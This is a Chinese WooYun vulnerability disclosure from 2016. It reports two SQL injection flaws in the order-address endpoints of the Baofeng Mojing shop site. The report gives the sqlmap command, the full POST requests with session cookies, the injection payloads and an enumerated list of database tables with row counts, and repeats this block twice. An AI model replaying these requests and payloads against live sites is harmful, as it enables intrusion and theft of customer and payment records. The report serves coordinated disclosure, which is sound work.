当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204847

漏洞标题:暴风魔镜多出SQL注入泄露大量订单信息会员信息

相关厂商:暴风魔镜

漏洞作者: 黑色键盘丶

提交时间:2016-05-04 11:55

修复时间:2016-06-18 12:00

公开时间:2016-06-18 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

RT 厂商大哥

详细说明:

两处post注入语法:sqlmap.py -r 1.txt --dbs
---------------------------post数据包----------------------------- 注入参数address_id
POST /order/user/myaddressdelete HTTP/1.1
Host: www.mojing.cn
Proxy-Connection: keep-alive
Content-Length: 69
Origin: http://www.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mojing.cn/order/user/myaddress
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
address_id=49152&is_order_page=is_myaddress_page&dis_address_id=49152
=====================================================================
Parameter: address_id (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: address_id=(SELECT (CASE WHEN (8966=8966) THEN 8966 ELSE 8966*(SELE
CT 8966 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&is_order_page=is_myaddress
_page&dis_address_id=49152
---
另外一处
------------------------post数据包------------------------------------- 注入参数address_id_e
POST /order/user/myaddressedit HTTP/1.1
Host: www.mojing.cn
Proxy-Connection: keep-alive
Content-Length: 386
Origin: http://www.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mojing.cn/order/user/myaddress
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
address_link_province_id_e=110000&address_link_province_name_e=北京市&address_link_city_id_e=130400&address_link_city_name_e=邯郸市&address_link_area_id_e=130401&address_link_area_name_e=市辖区&address_link_name_e=黑色键盘&address_link_mobile_e=13655578555&address_link_mobile_back_e=13655578555&address_link_detail_e=111111111&address_id_e=49152&address_link_code_e=111111
===============================================================
Parameter: address_id_e (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: address_link_province_id_e=110000&address_link_province_name_e=????
?????&address_link_city_id_e=130400&address_link_city_name_e=é??é?????&address_l
ink_area_id_e=130401&address_link_area_name_e=???è?????&address_link_name_e=é??è
??é?????&address_link_mobile_e=13655578555&address_link_mobile_back_e=1365557855
5&address_link_detail_e=111111111&address_id_e=49152;(SELECT * FROM (SELECT(SLEE
P(5)))ArXO)#&address_link_code_e=111111
---


数据库信息

available databases [2]:
[*] information_schema
[*] shop


商品表信息

Database: shop
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| sms_send_log | 1740521 |
| financial_alipay_log | 260480 |
| order_history | 144861 |
| goods_booking_info | 83855 |
| order_goods | 51689 |
| order_address | 50871 |
| order_express | 50871 |
| order_invoice | 50871 |
| order_info | 50773 |
| weidian_user | 46435 |
| weidian_usersub | 46381 |
| userid | 39879 |
| order_cart | 36996 |
| data_sale | 36316 |
| order_paylog | 36042 |
| weidian_usershare | 29982 |
| pic_center_picture | 19622 |
| order_ready | 11500 |
| edb_order | 6022 |
| activity_user_log | 3816 |
| order_refund | 3186 |
| basic_area | 3152 |
| order_return | 1833 |
| weidian_useraddress | 642 |
| static_file | 571 |
| goods_act_stats | 365 |
| edb_order_refund | 351 |
| basic_city | 345 |
| user_info | 304 |
| order_barter_address | 274 |
| goods_picture_mapping | 263 |
| order_barter | 255 |
| basic_freight | 186 |
| goods_picture_mapping0115 | 174 |
| admin_menu | 157 |
| goods_picture | 108 |
| weidian_usersub_mirror | 108 |
| order_action | 67 |
| goods | 46 |
| admin_user | 37 |
| basic_province | 31 |
| goods_booking | 29 |
| goods0115 | 27 |
| basic_express | 25 |
| activity_purchase | 19 |
| goods_property | 19 |
| goods_attr | 17 |
| goods_property_h5 | 17 |
| admin_group | 16 |
| goods_h5 | 16 |
| order_activity | 16 |
| goods_property0115 | 14 |
| cms_nav | 7 |
| basic_freight_plan | 6 |
| goods_gift_activity | 6 |
| mcode_log | 6 |
| cms_activity | 5 |
| cms_evaluate | 5 |
| cms_masscontent | 4 |
| cms_masstype | 4 |
| cms_hotsale | 3 |
| cms_video | 3 |
| activity_order | 2 |
| financial_account | 2 |
| crontab_list | 1 |
+---------------------------+---------+


信息就不跑咯

漏洞证明:

两处post注入语法:sqlmap.py -r 1.txt --dbs
---------------------------post数据包----------------------------- 注入参数address_id
POST /order/user/myaddressdelete HTTP/1.1
Host: www.mojing.cn
Proxy-Connection: keep-alive
Content-Length: 69
Origin: http://www.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mojing.cn/order/user/myaddress
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
address_id=49152&is_order_page=is_myaddress_page&dis_address_id=49152
=====================================================================
Parameter: address_id (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: address_id=(SELECT (CASE WHEN (8966=8966) THEN 8966 ELSE 8966*(SELE
CT 8966 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&is_order_page=is_myaddress
_page&dis_address_id=49152
---
另外一处
------------------------post数据包------------------------------------- 注入参数address_id_e
POST /order/user/myaddressedit HTTP/1.1
Host: www.mojing.cn
Proxy-Connection: keep-alive
Content-Length: 386
Origin: http://www.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mojing.cn/order/user/myaddress
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
address_link_province_id_e=110000&address_link_province_name_e=北京市&address_link_city_id_e=130400&address_link_city_name_e=邯郸市&address_link_area_id_e=130401&address_link_area_name_e=市辖区&address_link_name_e=黑色键盘&address_link_mobile_e=13655578555&address_link_mobile_back_e=13655578555&address_link_detail_e=111111111&address_id_e=49152&address_link_code_e=111111
===============================================================
Parameter: address_id_e (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: address_link_province_id_e=110000&address_link_province_name_e=????
?????&address_link_city_id_e=130400&address_link_city_name_e=é??é?????&address_l
ink_area_id_e=130401&address_link_area_name_e=???è?????&address_link_name_e=é??è
??é?????&address_link_mobile_e=13655578555&address_link_mobile_back_e=1365557855
5&address_link_detail_e=111111111&address_id_e=49152;(SELECT * FROM (SELECT(SLEE
P(5)))ArXO)#&address_link_code_e=111111
---


数据库信息

available databases [2]:
[*] information_schema
[*] shop


商品表信息

Database: shop
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| sms_send_log | 1740521 |
| financial_alipay_log | 260480 |
| order_history | 144861 |
| goods_booking_info | 83855 |
| order_goods | 51689 |
| order_address | 50871 |
| order_express | 50871 |
| order_invoice | 50871 |
| order_info | 50773 |
| weidian_user | 46435 |
| weidian_usersub | 46381 |
| userid | 39879 |
| order_cart | 36996 |
| data_sale | 36316 |
| order_paylog | 36042 |
| weidian_usershare | 29982 |
| pic_center_picture | 19622 |
| order_ready | 11500 |
| edb_order | 6022 |
| activity_user_log | 3816 |
| order_refund | 3186 |
| basic_area | 3152 |
| order_return | 1833 |
| weidian_useraddress | 642 |
| static_file | 571 |
| goods_act_stats | 365 |
| edb_order_refund | 351 |
| basic_city | 345 |
| user_info | 304 |
| order_barter_address | 274 |
| goods_picture_mapping | 263 |
| order_barter | 255 |
| basic_freight | 186 |
| goods_picture_mapping0115 | 174 |
| admin_menu | 157 |
| goods_picture | 108 |
| weidian_usersub_mirror | 108 |
| order_action | 67 |
| goods | 46 |
| admin_user | 37 |
| basic_province | 31 |
| goods_booking | 29 |
| goods0115 | 27 |
| basic_express | 25 |
| activity_purchase | 19 |
| goods_property | 19 |
| goods_attr | 17 |
| goods_property_h5 | 17 |
| admin_group | 16 |
| goods_h5 | 16 |
| order_activity | 16 |
| goods_property0115 | 14 |
| cms_nav | 7 |
| basic_freight_plan | 6 |
| goods_gift_activity | 6 |
| mcode_log | 6 |
| cms_activity | 5 |
| cms_evaluate | 5 |
| cms_masscontent | 4 |
| cms_masstype | 4 |
| cms_hotsale | 3 |
| cms_video | 3 |
| activity_order | 2 |
| financial_account | 2 |
| crontab_list | 1 |
+---------------------------+---------+


信息就不跑咯

修复方案:

过滤啦

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-04 11:58

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无